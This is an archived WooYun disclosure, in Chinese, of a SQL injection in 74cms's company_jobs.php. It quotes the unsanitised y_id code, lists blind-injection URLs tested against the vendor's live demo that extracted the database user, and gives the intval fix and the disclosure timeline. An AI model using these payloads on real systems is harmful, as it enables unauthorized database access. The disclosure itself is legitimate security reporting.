乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-04: 细节已通知厂商并且等待厂商处理中 2014-11-08: 厂商已经确认,细节仅向厂商公开 2014-11-11: 细节向第三方安全合作伙伴开放 2015-01-02: 细节向核心白帽子及相关领域专家公开 2015-01-12: 细节向普通白帽子公开 2015-01-22: 细节向实习白帽子公开 2015-02-02: 细节向公众公开
骑士CMS某接口SQL注入,官网测试。
翻了翻代码,看到有这么一段:user/company/company_jobs.php:
elseif ($act=='jobs_perform'){ global $_CFG; $yid =!empty($_POST['y_id'])?$_POST['y_id']:$_GET['y_id']; $jobs_num=count($yid); if (empty($yid)) { showmsg("ÄãûÓÐÑ¡Ôñְλ£¡",1); } $refresh=!empty($_POST['refresh'])?$_POST['refresh']:$_GET['refresh']; $delete=!empty($_POST['delete'])?$_POST['delete']:$_GET['delete']; if ($refresh) { if($jobs_num==1){ if(is_array($yid)){ $yid = $yid[0]; } $jobs_info = $db->getone("select * from ".table('jobs')." where id=".$yid); if(empty($jobs_info)){ $jobs_info = $db->getone("select * from ".table('jobs_tmp')." where id=".$yid); } if($jobs_info['deadline']<time()){ showmsg("žÃְλÒѵœÆÚ£¬ÇëÏÈÑÓÆÚ£¡",1); } }
下面的GET/POST参数没有check,
$yid =!empty($_POST['y_id'])?$_POST['y_id']:$_GET['y_id']
然后就带入了SQL:
$jobs_info = $db->getone("select * from ".table('jobs')." where id=".$yid);
这不是可以注入么?官网试试,果然是这样:
http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19%27
返回SQL错误:
好了,试试盲注猜user():错误的返回:
http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19 or strcmp(substr(user(),1,1),char(110))
正确时候的返回:
http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19 or strcmp(substr(user(),1,1),char(114))
中间过程略,可以猜到:
http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19 or strcmp(substr(user(),1,14),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116))
> select char(114,111,111,116,64,108,111,99,97,108,104,111,115,116);+------------------------------------------------------------+| char(114,111,111,116,64,108,111,99,97,108,104,111,115,116) |+------------------------------------------------------------+| root@localhost |+------------------------------------------------------------+1 row in set (0.00 sec)
$yid =!empty($_POST['y_id'])?intval($_POST['y_id']):intval($_GET['y_id']);
危害等级:高
漏洞Rank:15
确认时间:2014-11-08 10:36
感谢反馈!
暂无
